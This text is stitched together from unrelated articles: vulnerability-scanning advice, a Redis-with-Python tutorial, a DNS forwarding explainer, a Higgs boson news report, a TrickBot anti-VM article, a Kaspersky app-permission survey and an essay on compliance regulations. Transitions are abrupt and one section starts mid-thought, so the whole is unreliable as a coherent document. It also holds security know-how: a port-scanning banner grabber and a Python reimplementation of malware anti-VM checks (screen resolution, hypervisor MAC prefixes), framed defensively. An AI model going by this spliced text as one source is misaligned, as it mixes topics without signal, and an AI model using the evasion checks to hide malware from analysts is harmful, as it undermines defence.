The first step in the vulnerability management process is to discover and classify an organization’s assets. These include:

- Source code
- Bare metal servers and Virtual Machines (VMs)
- Web applications
- Cloud endpoints and hosts
- Container images
- Serverless applications

Asset discovery can be challenging in any environment. In a cloud native environment it is even more complex, because of the dynamic and ephemeral nature of computing resources. A common strategy for discovering cloud native assets is service discovery. Next, organizations should group assets to facilitate targeted vulnerability scans. They should base the asset classes on criteria like:

- Externally exposed assets
- Assets only accessed by internal components
- Resources storing confidential data or serving mission-critical functions

The next step involves identifying and assessing vulnerabilities within the protected environment. This process includes:

- An initial sweep of the environment to find live systems and verify their accessibility for the scans.
- Version fingerprinting to collect system data.
- Correlating data and comparing it to known vulnerability lists.

Properly configured vulnerability scanners are essential to provide accurate results, reduce false positives, and avoid scanning issues. Vulnerability assessments require careful planning to ensure accuracy and consistency.

Triage and Analysis

After identifying vulnerabilities, it is important to contextualize the vulnerability data. Scoring criteria like CVSS help organizations prioritize risks and mitigate the most critical vulnerabilities. The vulnerability triaging process should include the following:

- Distinguishing real vulnerabilities from false positives.
- Determining if vulnerabilities are exploitable via the Internet.
- Identifying published exploits.
- Assessing the likelihood and potential impact of a breach.
- Identifying the security controls to mitigate attacks.

Vulnerability scanners often generate false positives due to misconfiguration. A human security team can help identify false positives and prioritize high-risk vulnerabilities. After confirming the risk level of vulnerabilities, the team must remediate them using various tools and techniques.
There are several approaches to handling vulnerabilities:

- Elimination—applying patches or fixing the code.
- Mitigation—reducing the impact and likelihood of an exploit.
- Acceptance—acknowledging the risk and choosing not to fix the vulnerability.

Not all vulnerabilities require elimination or mitigation—other security controls might provide an adequate solution. Scanning tools offer remediation capabilities but are usually insufficient on their own and should accompany manual investigation and remediation processes. The final step is to validate the fixes applied to vulnerabilities to ensure they function as intended. Validation is a continuous process that informs the overall vulnerability management strategy.

Traditional Vulnerability Scanners

Network Vulnerability Scanners

A network vulnerability scanner covers all systems throughout the network, sending probes to identify open ports and services, then further examining each service for details. It can discover configuration issues and known vulnerabilities. Deployment may vary—organizations can install hardware devices within the network or deploy virtual devices on virtual machines to scan all other devices in the network. Keeping devices up-to-date in line with network changes can quickly get complicated. When the network becomes more complex, the number of vulnerability scanners required to process every network segment increases.

Web Application Vulnerability Scanners

Publicly accessible web applications require regular vulnerability scans to prevent attacks. Cybercriminals often exploit web application vulnerabilities such as cross-site scripting (XSS) to inject malicious code into applications and modify trusted data, relying on the unsuspecting user to execute the malicious script. Web application scanners are useful for verifying the implementation of input validation within a comprehensive web app security program. Security teams should continuously scan for Secure Sockets Layer (SSL) configuration issues and review the results to stay up-to-date. It is a best practice to shift security left by running static application security testing (SAST) at early development stages. This can identify web application vulnerabilities while code is being developed and help developers fix them long before deployment to production.

Host-Based Vulnerability Scanners

A host-based vulnerability scanner identifies vulnerabilities by evaluating the operating systems and configurations of local network hosts such as servers. There are three main types of host-based vulnerability scans:

- Agent-server scan—software agents installed on endpoints perform vulnerability scans and report data to a central server for further analysis. Agents typically collect real-time data and send it back to a management system. One of the problems with agent-server scans is that each agent is linked to an operating system.
- Agentless scan—this method involves initiating scans from a central command center or based on automated schedules. It requires using administrator credentials to access network systems. Agentless scans have different operating system requirements from agent-based scans, meaning they can cover more resources. However, the evaluation requires a consistent network connection and may be less thorough than agents.
- Standalone scan—this method does not require network connections and is the most labor-intensive host-based vulnerability scanning approach. Each host must have a scanner installed.
A standalone approach may not be feasible for most organizations managing hundreds or thousands of endpoints. After each scan, the security team must collect, compile, analyze, and report on data from every host. This data then informs mitigation procedures.

Modern Vulnerability Scanners Supporting Shift-Left Security

Source Code Scanners

Source code is the basis of operating systems and applications. The Open Web Application Security Project (OWASP) ranked insecure design as #4 in its top 10 vulnerabilities list for 2021. A source code scanning tool can compare code to NIST’s National Vulnerability Database, which lists Common Vulnerabilities and Exposures (CVE) entries, including those affecting open source code.

Cloud Vulnerability Scanners

Cloud computing offers many benefits to organizations of any size, including the scalability of SaaS, PaaS, and IaaS implementations. Virtual access controls are necessary to protect cloud infrastructure, just like the access control devices that physically secure a data center. Implementing cloud security is critical to modern enterprises. Therefore, vulnerability management programs should include cloud service discovery and vulnerability scanning tools, as well as misconfiguration detection, as early as possible.

Container Vulnerability Scanners

Containerized applications are becoming increasingly popular, but they can pose a security risk if not handled properly. A major security risk with containers relates to container images—the templates used to build new containers. Container images often contain bugs and security vulnerabilities, passing on these vulnerabilities to all containers built from them. Vulnerability scanning of container-based applications prevents security flaws and vulnerabilities from reaching the production environment. It allows developers to avoid using vulnerable images to create production containers. A container vulnerability scanner continuously scans and audits containers and images, making it an integral part of the DevSecOps process.

Vulnerability Scanning Best Practices

The following best practices help ensure an effective vulnerability management strategy.

Run Vulnerability Scans Frequently

Every organization should have a vulnerability management program tailored to its DevOps environment. The vulnerability management process should be accurate, continuous, and fast. Powerful vulnerability scanners are the best way to achieve this, providing the following benefits with frequent scanning:

- Accurate reporting—machine learning-based vulnerability scanners can improve over time, increasing the accuracy of scans. They reduce the number of false positives and increase reporting accuracy, generating reports quickly.
- Automated scanning—vulnerability scanners can automatically run checks for every code change. Each new application version can introduce potential vulnerabilities, so running automated scans for all updates is essential.
- Compliance—security audits are mandatory in many industries, and vulnerability reporting is an important part of these activities. Therefore, regular vulnerability scanning is essential for maintaining regulatory compliance. Staying ahead of security threats also builds trust and reassures customers regarding potential security threats.
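As a deliberately simplified illustration of the sweep-and-fingerprint steps in the scanning process described earlier, the Python sketch below probes a few common ports on a host and records whatever banner each service volunteers, using only the standard library. A real scanner would correlate this output against vulnerability signatures; this sketch stops at collection, and it should only be pointed at hosts you are authorized to scan.

import socket

def grab_banner(host, port, timeout=2.0):
    # Returns None if the port is closed/filtered, '' if open but silent,
    # otherwise the first bytes the service sends (its banner).
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.settimeout(timeout)
            try:
                return sock.recv(128).decode(errors="replace").strip()
            except socket.timeout:
                return ""
    except OSError:
        return None

host = "127.0.0.1"  # scan only hosts you are authorized to test
for port in (21, 22, 25, 80, 443, 6379):
    banner = grab_banner(host, port)
    if banner is not None:
        print("%s:%d open, banner: %r" % (host, port, banner))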
Implement Scans Early in the SDLC

Scanning shouldn’t wait until the deployment phases; packages should undergo scans immediately when built. Scanning as soon as possible has two advantages. First, addressing vulnerabilities early in the development pipeline is easier because the team hasn’t invested as much in the code. Suppose the security team waits until developers have run other types of tests on the package before scanning for vulnerabilities. In that case, they’d have to rebuild the software and re-run the tests if a vulnerability is detected. Second, scanning earlier helps minimize the risk of releasing insecure applications to production. No one should push an unscanned container image to the registry where users can download and install it. The early scans don’t replace pre-deployment scans; evaluating the software’s risks is important before pushing it to production. However, detecting vulnerabilities early in the development cycle helps reduce the burden later in the pipeline.

Keep Packages Small

The more dependencies and overall code the packages contain, the harder it will be for the vulnerability scanner to process every layer and find vulnerabilities. Fixing security issues and rebuilding packages can also be difficult if the packages contain too many objects. A package should only contain the code and resources needed to deploy a specific aspect of an application feature. Developers should avoid packaging multiple application components into the same package. For example, developers can create different Docker images for each microservice, which is better than building a single image with multiple microservices. Alternatively, they can separate the application logic from the front end, using two Debian packages instead of one.

Long lists of vulnerabilities in each package are unhelpful when the team tries to distinguish the more serious vulnerabilities from the less critical ones. Organizations can avoid this problem by using a scanner that allows them to assess vulnerability risks and prioritize according to each vulnerability’s likely impact. Prioritization helps teams utilize their time better, ignoring less important vulnerabilities while focusing on serious issues; a sketch of this ranking logic follows at the end of this article.

Expand Detection Coverage

Integrating security tests and scans into the CI/CD pipeline helps prevent exploits and disruptions by allowing teams to patch vulnerabilities quickly. Security teams should check many types of vulnerabilities, not just scan code. In addition to the code, they should consider the cloud and container infrastructure when scanning for vulnerabilities. Cloud service providers usually implement security best practices, but organizations should ensure they have full vulnerability detection coverage.
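The prioritization advice above is straightforward to automate. Here is a minimal, hypothetical sketch — the field names are made up for illustration rather than taken from any specific scanner's output format, and the CVE scores shown are approximate — that ranks findings so known-exploited issues surface first, then by CVSS severity:

from dataclasses import dataclass

@dataclass
class Finding:
    package: str
    cve: str
    cvss: float            # CVSS base score, 0.0-10.0
    exploit_public: bool   # whether a public exploit is known

# Illustrative findings only; in practice these come from scanner output.
findings = [
    Finding("openssl", "CVE-2021-3449", 5.9, True),
    Finding("libxml2", "CVE-2021-3517", 8.6, False),
    Finding("busybox", "CVE-2021-42386", 7.2, False),
]

# Known-exploited issues first, then descending severity.
ranked = sorted(findings, key=lambda f: (f.exploit_public, f.cvss), reverse=True)
for f in ranked:
    level = "CRITICAL" if f.cvss >= 9.0 else "HIGH" if f.cvss >= 7.0 else "MEDIUM"
    print(f"{f.cve} ({f.package}): CVSS {f.cvss} {level}, public exploit: {f.exploit_public}")

Even this crude ordering puts the moderately scored but actively exploited issue ahead of the higher-scored but unexploited one, which matches how most triage teams actually work.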
Although the data is stored in the system’s memory, you can add persistence by dumping the stored data to disk and loading it when needed. In this guide, we will introduce you to key concepts in Redis and show you how to use Redis with the Python programming language.

The first step is to set up the development tools. In this guide, we will be using a Debian 11 Linux system. Open the terminal and add the official Redis repositories as:

sudo apt-get update
sudo apt-get install curl gnupg -y
curl https://packages.redis.io/gpg | sudo apt-key add -
echo "deb https://packages.redis.io/deb $(lsb_release -cs) main" | sudo tee /etc/apt/sources.list.d/redis.list
sudo apt-get update
sudo apt-get install redis -y

Once you have Redis installed, start the server using the command:

redis-server

You can also run the Redis server as a system service using the command shown below:

sudo service redis-server start

Before diving into using Python to work with a Redis database, let us first recap how to use Redis using the command-line interface.

Connecting to the cluster

Once the Redis server is running, open a new terminal session and enter the Redis command-line client as:

redis-cli

Once you run the redis-cli command, you should get a prompt showing an IP address and the port of the Redis server.

Redis does not work like a typical relational database. However, it does contain a concept of databases, which are isolated collections of key-value pairs. Unlike a database in relational databases, in Redis a database does not have schemas, tables, or rows. In Redis, we use index values such as 0 to access the first database. Redis does not provide custom naming such as sample_database as provided in traditional databases. To select a specific database, use the SELECT command followed by the database’s index. For example, to select the database at index 9:

127.0.0.1:6379> SELECT 9

Note: Database indexes in Redis run from 0 to 15. If you try to access an index of 16 or higher, you will get an out-of-range error:

127.0.0.1:6379> SELECT 16
(error) ERR DB index is out of range

As we mentioned, Redis uses key-value notation to store the data. You can add new data using the SET command, with the key and value separated by a space:

127.0.0.1:6379> SET name "John Doe"

If the Redis command executes successfully, you should see an [OK]. It is good to ensure you provide both the key and value in the SET command. Otherwise, you will get a wrong number of arguments error as shown:

127.0.0.1:6379> SET novalue
(error) ERR wrong number of arguments for ‘set’ command

You can fetch values stored in the Redis server using the GET command and the key name. For example, to get the value of the key “name” we can do:

127.0.0.1:6379> GET name

Ensure the specified key exists on the server. If you specify a non-existent key, you will get a nil result as:

(nil)

In Redis, you can delete a key and its related data by using the DEL command and the key’s name:

127.0.0.1:6379> DEL name

Using Python to Work with Redis

Although you can create your own library to work with Redis, a common practice is to use already available tools to perform such tasks. You can browse the Redis clients catalog to search for an appropriate library. In this example, we will use redis-py as it is actively maintained and easy to install and use.

Installing Python 3

Before proceeding further, ensure you have Python installed on your system. Open the terminal and enter the command:

python3 --version

If you get a “command not found” error such as:

-bash: python3: command not found

you need to install Python.
Use the commands:

sudo apt update
sudo apt install python3.9

The above commands will update the software repositories and install Python version 3.9. Once completed, ensure you have the correct Python version:

python3 --version

To install the redis-py package, we need to ensure we have pip installed. Open the terminal and enter the command:

sudo apt-get install python3-pip

Once you have pip3 installed, enter the command below to install the redis-py package:

pip3 install redis

Using the Redis-Py package

To illustrate how to work with Redis using the Python package, we will replicate the operations in the Redis basics section. Let us start by connecting to Redis. Create a Python file and add the code shown below to connect to the Redis cluster:

import redis

# create connection to the redis cluster
r = redis.Redis(host="localhost", port=6379)

Once we have a connection to the server, we can start performing operations.

NOTE: The file will connect to the database at index 0. You can specify your target index by setting the db parameter as:

r = redis.Redis(host="localhost", port=6379, db=10)

The above example will connect to the database at index 10.

To create a key-value pair using the Python package, you can do:

r.set("name", "John Doe")

The line above takes the first and second arguments as the key and value, respectively.

To fetch the value, use the get function as:

r.get("name")

The above query will return the value stored at the specified key as an encoded (bytes) value:

b'John Doe'

You can use the decode function to decode the value:

r.get("name").decode("utf-8")

To delete a key and its corresponding data, use the delete function as shown:

r.delete("name")

If you get the value stored in a deleted key, Python will return a None value.

In this article, we dove deep into working with the Redis database. Redis is powerful and can be essential in high-performance environments. Check the documentation to learn how to work with Redis and the Redis-Py package.
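Finally, the persistence mentioned at the start of this guide — dumping the in-memory dataset to disk — can also be triggered from redis-py. A short sketch, assuming the same local server as above (BGSAVE asks the server to write a snapshot in the background to its configured dump file, typically dump.rdb):

import redis

r = redis.Redis(host="localhost", port=6379)
r.set("name", "John Doe")

# Ask the server to snapshot the dataset to disk in the background.
r.bgsave()

# lastsave() reports when the last successful snapshot completed.
print(r.lastsave())

Because the snapshot runs in the background, lastsave() may briefly report the previous snapshot time until the new one finishes.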
There’s occasionally some confusion between DNS forwarding and HTTP redirection or the use of CNAME records to designate DNS aliases. DNS forwarding exclusively refers to the process where specific DNS requests are forwarded to a designated DNS server for resolution. It is not the solution for redirecting one domain to another, for which you would use an HTTP redirect. Nor is it useful for aliasing a subdomain to another domain: that’s the job of CNAME (Canonical Name) records.

What is DNS Forwarding?

DNS forwarding is the process by which particular sets of DNS queries are handled by a designated server, rather than being handled by the initial server contacted by the client. Usually, all DNS servers that handle address resolution within the network are configured to forward requests for addresses that are outside the network to a dedicated forwarder. When deciding how to allocate DNS resources on a network, it’s important to implement some separation between external and internal Domain Name Services. Having all DNS servers configured to handle both external and internal resolution can impact the performance and security of a network.

The terminology around DNS forwarding can be a bit confusing because the forwarder has DNS queries forwarded to it by DNS servers that aren’t forwarders — try saying that five times quickly! The DNS forwarder should be thought of as the designated server to which a particular subset of queries (either for external addresses or specific internal addresses) are forwarded by other DNS servers within the network. It then sends (forwards) those requests for resolution to other DNS servers.

Why Use DNS Forwarding For External Addresses?

If no DNS server is designated as the forwarder to which external queries are routed, then all DNS servers within the network will handle external requests, which means that they will query external resolvers. This is undesirable for two main reasons:

- Internal DNS information can be exposed on the open Internet. It’s far better to have a strict separation between internal and external DNS. Exposing internal domains on the open Internet creates a potential security and privacy vulnerability.
- Without forwarding, all DNS servers will query external DNS resolvers if they don’t have the required addresses cached. This can result in excessive network traffic. By designating a DNS server as a forwarder, that server is responsible for all external DNS resolution and can build up a cache of external addresses, reducing the need to query recursive resolvers and cutting down on traffic.

For smaller companies with limited available bandwidth, DNS forwarding can increase the efficiency of the network by both reducing bandwidth usage and improving the speed at which DNS requests are fulfilled.

DNS Forwarding For Internal Addresses

It’s also often useful to have a subset of internal addresses handled through DNS forwarding. For larger intranets with multiple domains and subdomains, it may be more efficient to have DNS requests for a subset of those domains handled by a dedicated server to which requests are forwarded with conditional DNS forwarding.
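Forwarding itself is configured on the DNS server (for example, with a forwarders directive in BIND), but the routing logic is easy to illustrate from Python. The sketch below uses the third-party dnspython library, with placeholder zone names and server addresses, to mimic conditional forwarding: queries for an internal zone go to an internal DNS server, and everything else goes to the designated forwarder.

import dns.resolver

INTERNAL_ZONE = "corp.example.com"   # hypothetical internal zone
INTERNAL_DNS = ["10.0.0.53"]         # hypothetical internal DNS server
FORWARDER = ["203.0.113.53"]         # hypothetical designated forwarder

def resolve(name, rdtype="A"):
    resolver = dns.resolver.Resolver(configure=False)
    # Conditional forwarding: choose the server based on the queried zone.
    if name.endswith(INTERNAL_ZONE):
        resolver.nameservers = INTERNAL_DNS
    else:
        resolver.nameservers = FORWARDER
    return [str(rdata) for rdata in resolver.resolve(name, rdtype)]

print(resolve("intranet.corp.example.com"))  # handled by the internal server
print(resolve("example.org"))                # sent to the external forwarder

On a real network this decision is made once, on the DNS servers themselves, so clients never need to know which server answers which zone.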
Scientists are getting very close to proving or disproving the existence of the subatomic particle known as the “Higgs boson.” The list of possible hiding spots for the Higgs boson particle has been narrowed down, according to teams carrying out experiments at CERN’s Large Hadron Collider in Geneva, Switzerland. The existence of the Higgs boson — also known as the “God particle” — is key to explaining why there is mass in the universe. It will likely be another year before scientists have enough data to say whether the elusive particle really exists.

The particle would weigh in at about 125 billion electron volts — roughly 133 times heavier than a proton and about 245,000 times heavier than an electron, according to physicists working on the ATLAS experiment at the LHC. They have seen “tantalizing hints” in that mass region, but “we cannot conclude anything at this stage,” said Fabiola Gianotti, an ATLAS spokesperson. “Given the outstanding performance of the LHC this year,” Gianotti said, there should be enough data to resolve the puzzle in 2012. Scientists working on the CMS experiment at the LHC also made some intriguing observations, excluding the existence of the SM Higgs boson in a wide range of possible Higgs boson masses, and they expect data collected in 2012 to illuminate their findings.

A Big, Big Step

For those who follow LHC developments, there are not enough superlatives to capture the importance of Tuesday’s announcement and the subsequent proof or non-proof of the Higgs boson particle expected in 2012. “Consider this the biggest question of our time. Higgs boson is believed to be the fundamental building block for the universe, and it is undiscovered,” Rob Enderle, principal analyst at the Enderle Group, told TechNewsWorld. “Proving it exists and how it works goes to the core of why there is a Large Hadron Collider in the first place.” The discovery of the Higgs boson may be the key to understanding how to build matter from energy, Enderle noted. Its confirmation would be “up there with the discovery of gravity and DNA,” he said. “It is likely even more important, since understanding this particle could change forever how we view reality.”

‘No Higgs Boson’ Would Be Big News

The fact that it may not even exist “in and of itself would be interesting,” said Enderle, “because that would mean some core calculations we use to explain how the universe works are faulty.” If it does exist, the Higgs boson is likely a very large little particle. It would qualify as “a massive elementary subatomic particle,” Charles King, principal analyst at Pund-IT, told TechNewsWorld. “It will also reinforce the Standard Model of modern particle physics, including the existence and creation of mass.” The development and construction of CERN’s Large Hadron Collider underlines the importance of this point, he noted. “LHC’s funding was largely predicated on searching for and finding elemental particles including the HB.”

The biggest surprise might be that the Higgs boson particle doesn’t exist. The impact of confirmed nonexistence could be as great as discovering the particle. “That point is obviously central to so-called ‘Higgs-less models’ which depend on other mechanisms for mass generation,” said King. The Higgs boson quest is just one of the missions of the LHC. In another fascinating area of research, investigators reported indications of subatomic particles traveling faster than the speed of light. If proven, “that would contradict Einstein’s theory of special relativity,” said King.
The infamous TrickBot trojan has started to check the screen resolutions of victims to detect whether the malware is running in a virtual machine. When researchers analyze malware, they typically do so in a virtual machine configured with various analysis tools. Because of this, malware commonly uses anti-VM techniques to detect whether it is running in a virtual machine; if it is, it is most likely being analyzed by a researcher or an automated sandbox system. These anti-VM techniques include looking for particular processes, Windows services, or machine names, and even checking network card MAC addresses or CPU features.
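To see how trivial such checks are — and why analysts configure sandboxes with realistic hardware profiles — the sketch below reproduces two of the checks described, in Python. It compares the primary screen resolution against sizes common in default virtual machines and looks for hypervisor-vendor MAC address prefixes. The resolution check is Windows-only (ctypes.windll), the OUI list is a small illustrative subset, and the snippet is intended for validating analysis environments, not for evasion.

import ctypes
import uuid

# Screen resolution check (Windows): GetSystemMetrics(0) is the primary
# display width, GetSystemMetrics(1) is its height.
user32 = ctypes.windll.user32
width, height = user32.GetSystemMetrics(0), user32.GetSystemMetrics(1)
suspicious_res = (width, height) in {(800, 600), (1024, 768)}

# MAC prefix check: OUIs assigned to common hypervisor vendors.
VM_OUIS = {"00:05:69", "00:0c:29", "00:50:56",  # VMware
           "08:00:27"}                           # VirtualBox
mac = "{:012x}".format(uuid.getnode())
oui = ":".join(mac[i:i + 2] for i in (0, 2, 4))
suspicious_mac = oui in VM_OUIS

print("looks like a default VM:", suspicious_res or suspicious_mac)

If a sandbox trips either check, hardening it is straightforward: give the VM a non-default resolution and a MAC address outside the well-known hypervisor ranges.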
Kaspersky Lab's "Are you cyber savvy?" quiz, which questioned more than 18,000 consumers about their online habits, found that an alarming number of consumers are leaving their privacy – and the data on their phones – exposed to cyber threats because they are not installing apps on their devices safely.

When users neglect to read license agreements or messages during the app install process, they do not know what they are agreeing to. Some apps can affect user privacy, prompt the installation of other apps, or even change the OS settings of a device completely legally, because the user has 'agreed' to it during the installation process.

The quiz also discovered that just under half (43 per cent) of users could be at risk from the apps on their mobile device because they are not 'cyber-savvy' enough to limit app permissions when installing apps. Fifteen per cent of quiz respondents do not limit what their apps can do on their phone at all, 17 per cent give apps permissions when prompted but then forget about it, and 11 per cent think they can't change those permissions. When app permissions are left unchecked, it is possible – and legal – for apps to access the personal and private data on mobile devices, from contact information to photos and location data.

Commenting on the findings, David Emm, Principal Security Researcher at Kaspersky Lab, says: "Internet users are entrusting their devices with sensitive information about themselves and others, such as contacts, private messaging etc., yet they are failing to ensure their information is entirely safe. This can turn their devices into their 'digital frenemies'. Because they are not taking precautions when they install apps, many consumers are granting apps permission to intrude on their private lives, watch what is stored on their devices and where they are, install additional unwanted apps and make changes to their devices right from the moment of installation. At Kaspersky Lab, we want to help consumers become more cyber-savvy and protect their precious data – and themselves – from these dangers."

To protect themselves, consumers should:
- Only download apps from trusted sources;
- Select the apps they wish to install on their device wisely;
- Read the license agreement carefully during the installation process;
- Read the list of permissions an app is requesting carefully, rather than simply clicking 'next' during installation without checking what they are agreeing to;
- Use a cybersecurity solution that will protect their device from cyber threats.
Compliance regulations provide organizations with acceptable standards for developing strong cybersecurity programs, and compliance is an important tenet underlying the development and maintenance of information security programs. Different regulations have emerged over the years to address increasing security challenges.

Today, cyber actors relentlessly innovate new security risks, malware, trojans, and programs for compromising organizational security. Emerging technologies have also brought unprecedented security risks. For example, the use of virtual currencies such as Bitcoin, Monero, and Ethereum has caused cryptojacking attacks to rise, edging out ransomware attacks, which had been dominant for years. It is therefore vital for organizations to understand the current and future state of cybersecurity and how they can best protect themselves from emerging threats. A primary response has been the establishment of international and local regulatory bodies that develop security standards to enable companies to harden their security postures. A common feature of compliance is that regulations, standards, policies, and legislation are directly influenced by evolving cybersecurity environments. Many organizations thus find it a challenge to maintain acceptable compliance postures.

Current Compliance Regulations

Compliance regulations provide organizations with directives for safeguarding their data and IT systems and for addressing existing privacy and security concerns. They also ensure that companies fulfill their obligations to prevent accidental breaches and attacks caused by negligence or insufficient security programs. Most regulations compel organizations to secure their systems by implementing a variety of basic security measures such as firewalls, adequate risk assessments, data encryption technologies, and training employees on the secure use and handling of sensitive information. Whereas some regulations are voluntary, others are mandatory. Consequently, organizations should demonstrate that they not only understand them but also implement and maintain them accordingly, and they should be able to produce evidence of compliance at any time.

Benefits of Compliance Regulations

- Business opportunities: compliance regulations are meant to enable companies to secure their systems and observe best practices for protecting data. Potential customers often incline towards businesses that fully comply with existing laws.
- Reduced risk: the guidelines and recommendations provided in compliance regulations allow companies to reduce cyber threats, as they are tested and accepted internationally.
- Avoiding fines and penalties: most compliance regulations are mandatory, and non-compliance leads to hefty penalties. Some, such as the GDPR, may fine organizations millions of dollars. Complying protects a business from such fines, which is an advantage as far as its finances are concerned.
- The rule of law: compliance regulations ensure that all businesses abide by the same rules. Compliance levels the field, as enterprises can adopt equal security measures and be assured of adequate security.
- Increased efficiency and improved economies of scale: compliance regulations are developed to provide businesses with cost-friendly yet effective security practices. At minimal cost, a business can deploy working security solutions and enjoy the same protection as a Fortune 100 company.
Existing Compliance Regulations and Requirements

- HIPAA

HIPAA (the Health Insurance Portability and Accountability Act) is a regulation for securing health data in organizations across all industries. Organizations often collect and store the health data of their employees, while healthcare institutions interact with patient data daily. Health information is highly sensitive and must not be disclosed to unauthorized parties, so protective measures for securing it must be implemented. The HIPAA compliance regulation contains a set of requirements of which each organization must demonstrate a full understanding. HIPAA also requires businesses to implement training programs that equip employees with security and awareness skills; training staff ensures they are aware of their security responsibilities when accessing information systems that house sensitive health data. HIPAA further requires companies to develop and maintain processes for detecting and preventing security violations. To be HIPAA compliant, an organization should, at all times, conduct risk analysis and assessments to identify security vulnerabilities in its systems, followed by steps for managing and reducing the identified risks to ascertain that information systems and infrastructures are no longer exposed. Moreover, HIPAA dictates that organizations create sanction policies for dealing with non-compliant staff members.

- FISMA

The Federal Information Security Management Act (FISMA) was developed to enable federal agencies to secure their information systems. The regulation applies to all partners and contractors that conduct any business with federal agencies. A main focus of FISMA is to enable federal agencies to develop awareness and security training programs. These programs aim to ensure that all users interacting with federal information systems are aware of the security guidelines and practices they must adhere to. FISMA requires personnel working either in federal agencies or with them, i.e., contractors and business partners, to participate in the training programs and understand the underlying security guidelines and procedures. Anyone accessing federal information or federal information systems must prove to have completed the training course and to fully understand the course material. Personnel must also demonstrate an ability to put the acquired skills into practice and competently apply best practices to secure federal information.

- PCI-DSS

The Payment Card Industry Data Security Standard (PCI-DSS) is a compliance regulation designed for organizations that handle credit cards. The standard provides businesses with security guidelines to implement in order to secure customers' financial information. PCI-DSS affects businesses that process credit cards, which require cardholders to input sensitive information on online platforms such as eCommerce websites. As a result, there is always a risk that cybercriminals may compromise such platforms and thereby gain access to sensitive information, so PCI-DSS-compliant organizations have to implement all of the recommended security measures to safeguard client information. Some of the requirements of the standard include installing firewalls and configuring them to protect cardholder data, and resetting the default security parameters and system passwords of vendor-supplied systems.
This ensures that new passwords are hard to crack and that security parameters are configured to meet the security needs of the organization. PCI-DSS also tasks organizations with implementing security measures for encrypting card information relayed over public, insecure networks. Other requirements include adopting access control strategies to restrict unauthorized access to card information and regularly testing the security of systems and processes.

- GDPR

The General Data Protection Regulation (GDPR) has become immensely prominent since it took effect in 2018. The regulation requires organizations to implement sufficient security protocols for securing personally identifiable information belonging to individuals in the European Union. The GDPR's provisions apply to all organizations in the world as long as they handle and process data belonging to EU citizens. The regulation has compelled many organizations to comply in order to avoid the hefty fines that come with non-compliance. Additionally, a company can be fined if insufficient security processes cause a data breach leading to the loss or disclosure of personally identifiable information; Google, for instance, was fined €44 million for using user data to promote ads. GDPR requires companies to notify data owners of any intent to use their data for any reason, and an organization must obtain the explicit consent of the data owner or risk being fined heavily. GDPR also encourages businesses to implement and maintain mechanisms for securing personal data, including encryption, password protection, and access control measures, among other requirements that aim to boost data security.

- NIST 800-53

The NIST (National Institute of Standards and Technology) publication 800-53 provides federal agencies with guidelines for securing their information systems; organizations in the private sector use the same guidelines to harden their cyber defenses. The NIST 800-53 framework provides federal agencies and their contractors with guidelines they can implement to comply with FISMA. The guidelines comprise various controls that can aid in developing secure information systems that are resilient to cyber attacks. The proposed measures include management, technical, and operational safeguards which, when implemented, preserve the availability, confidentiality, and integrity of information and information management systems. NIST 800-53 also provides security guidance based on the security control baseline concept, which is used to identify the controls that meet the security needs of an organization. The baselines provide federal agencies and private organizations with considerations such as functional and operational needs, including common threats to organizational information systems. The publication further describes a tailoring process that an organization can use to identify the controls that provide security according to the requirements of its information systems. Some of the security controls recommended in the publication include access control, awareness and training, audit and accountability, configuration management, contingency planning, incident response, personnel security, identification and authentication, and system and communications protection.
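Several of the regulations above (PCI-DSS, GDPR, NIST 800-53) converge on encryption of sensitive data as a baseline control. As a minimal illustration, not a compliance-certified implementation, the sketch below encrypts a personal record with an authenticated symmetric cipher using the widely used Python cryptography package; key management, rotation, and access control are deliberately out of scope.

```python
# Minimal sketch: encrypting a personal record at rest with authenticated
# symmetric encryption (Fernet, from the "cryptography" package). This
# illustrates the kind of control GDPR and PCI-DSS describe; real
# deployments also need key management, rotation, and access control.
from cryptography.fernet import Fernet

key = Fernet.generate_key()      # in practice, fetch from a key vault, not code
cipher = Fernet(key)

record = b'{"name": "Jane Doe", "card_last4": "4242"}'
token = cipher.encrypt(record)   # ciphertext is authenticated and timestamped
print(token)

assert cipher.decrypt(token) == record  # only holders of the key can read it
```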
Balancing Compliance Regulations and Cybersecurity

Compliance regulations play an integral role in fostering cybersecurity. However, as witnessed with the recent enactment of the GDPR, many businesses have channeled resources and time into complying with the regulation rather than focusing on sound security practice. What's worse, most regulations become outdated quickly, meaning that organizations will always struggle to stay compliant with new standards and regulations. It is also important to note that cybercriminals have access to the regulations; they will always find a way to work around the security guidelines contained in them. Essentially, companies exhaust finances, human resources, and time on compliance regulations with inherent vulnerabilities instead of focusing on fool-proof cyber defenses.

But what can be done to address such issues? Businesses have the responsibility of investing in the latest defensive trends to counter new threats and attacks; maintaining multiple regulations to remain compliant without addressing cybersecurity defense can be detrimental to their security. To balance the two areas, regulation and security, companies should invest in technologies that can achieve both purposes. An ideal example of an approach that can be explored here is artificial intelligence. AI systems are often used to digest vast quantities of information, such as those contained in multiple regulatory regimes. Depending on the security needs of a company, this technology can ensure that it is always compliant with existing and emerging regulations. At the same time, AI has proved useful in developing cybersecurity tools such as antivirus solutions, intelligent firewalls, and intrusion prevention and detection systems. AI not only allows a company to kill two birds with one stone, but also provides solutions to other challenges, such as reducing the cost and labor needed to achieve full compliance and strong cybersecurity.

The Future of Cybersecurity

Recent cyber attacks have resulted in large-scale damage and widespread destruction. In 2017, WannaCry, one of the most significant ransomware attacks to date, hit many countries around the globe. The United Kingdom's National Health Service was the most affected, as the attack crippled services across major healthcare facilities for close to a week. The NotPetya ransomware attack followed in the same period, targeting power and energy companies in Ukraine and oil companies in Russia and causing huge losses and damages. Such attacks demonstrate why researchers and governments are continuously working towards better defensive strategies to stay a step ahead. However, although a lot is being done to provide working mitigations to rampant cybercrime, the cyber threat environment will keep changing as new technologies emerge; these will be leveraged both in fighting cybercrime and in developing more sophisticated attack patterns.

The Entry of 5G Networks

Many countries are set to roll out 5G network connectivity and infrastructure convergence, chief among them South Korea, China, and the United States. Huawei has already released smart TVs in Chinese markets that use 5G networks. While the new networks bring many benefits, most of which rely on their super-fast speeds, 5G is poised to create some of the biggest challenges in the cybersecurity landscape. 5G networks not only provide faster internet speeds; they are designed to connect billions of new devices every year.
These devices will use the internet to run critical infrastructure and applications at speeds at least 1,000 times faster than current internet speeds. As a result, new architectures will emerge and be used to connect whole geographic locations and communities, industries, and critical infrastructure.

